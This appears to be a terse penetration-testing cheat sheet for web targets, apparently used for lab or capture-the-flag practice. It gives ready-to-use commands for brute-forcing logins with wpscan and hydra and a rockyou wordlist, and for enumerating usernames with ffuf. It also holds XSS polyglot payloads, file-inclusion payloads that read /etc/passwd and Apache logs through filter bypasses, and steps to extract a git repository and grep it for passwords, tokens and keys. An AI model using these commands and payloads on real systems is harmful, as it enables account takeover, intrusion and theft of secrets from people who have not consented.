General Web
WordPress Scan:
wpscan --url <url> --usernames <username> --passwords /usr/share/wordlists/rockyou.txtHydra Web Bruteforce:
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP ADDRESS> http-post-form "/<PATH TO /LOGINPAGE.php>/:<param1>=<param1 value>&<password Param>=^PASS^:<Unique Text for fail>"Authentication
Discover Usernames Using Fuff:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<domain> -mr "username already exists"Flag
Description
-w
Wordlist
-X
Request Type
-d
Request Arguments, FUZZ will be replaced
-H
Adds Header Argument
-u
URL for fuzzing
-mr
Text that appears when we hit a val
XSS Polyglots
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('1')//>\x3ejaVasCript:/*-/*`/*\`/*'/*"/*%0D%0A%0d%0a*/(/* */oNcliCk=alert() )//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3ciframe/<iframe/oNloAd=alert()//>\x3eFile Inclusion
# Base64 filter and path filter bypass
php://filter/read=convert.base64-encode/resource=./somerequiredpath/../index
# filter Removes .. and /
....//....//....//....//....//etc/passwd
# Filter LIF
php://filter/resource=./dog/../../../../../../../var/log/apache2/access.log&ext=Git Find Secrets
# Tool: https://github.com/internetwache/GitTools
chmod +x extractor.sh
./extractor.sh /Downloads/Repo /Downloads/extract_Location
cd /Downloads/extract_Location
grep -Ri "password\|username\|token\|key" .Last updated